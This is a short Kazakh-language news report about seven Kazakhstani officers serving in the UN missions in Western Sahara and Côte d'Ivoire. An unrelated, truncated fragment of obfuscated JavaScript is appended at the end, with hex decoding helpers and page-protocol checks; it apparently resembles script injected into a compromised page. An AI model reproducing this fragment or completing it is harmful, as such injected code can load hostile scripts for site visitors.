АСТАНА. 24 наурыз. Осы күндері Қазақстан Қарулы Күштерінің офицерлері Африканың Батыс Сахарасы мен Кот-д’Ивуар елдерінде БҰҰ-ның бітімгершілік миссиясына қатысып жатыр. Бұл туралы egemen.kz тілшісі хабарлады.
Қазақстан әскерилері жерүсті және әуеден патрульдеу, түнгі бақылау бекетін ұйымдастыру жұмыстарымен айналысуда.
Бұл миссияға 30-дан аса елдің өкілдері қатысуда. Әскери қызметшілердің айтуына қарағанда, миссиялардағы қиындықтар тек қана климатпен байланысты. Шөл даладағы қапырық, бағдарлар, жоғары температуралық режімдер – мұның барлығы кей кезде патрульдеуге қиындық туғызады.
Негізгі тапсырмамен, яғни, белгіленген жауапкершілік аймақтарын патрульдеумен қатар, олар мәлімет жинау және талдаумен айналысады, әскери уағдаластықты сақтау мониторингісін жүргізеді.
ҚР ҚК Бас штабы Жауынгерлік даярлық департаментінің мәліметіне қарағанда, бүгінде Батыс Сахарасы (MINURSO) мен Кот-д’Ивуардағы (UNOCI) БҰҰ-ның бітімгершілік миссиясына жеті қазақстандық офицер қатысып жатыр.
Дастан Кенжалин.
Дерек, сурет: Қорғаныс министрлігінің баспасөз қызметі.
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "egemen.kz"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e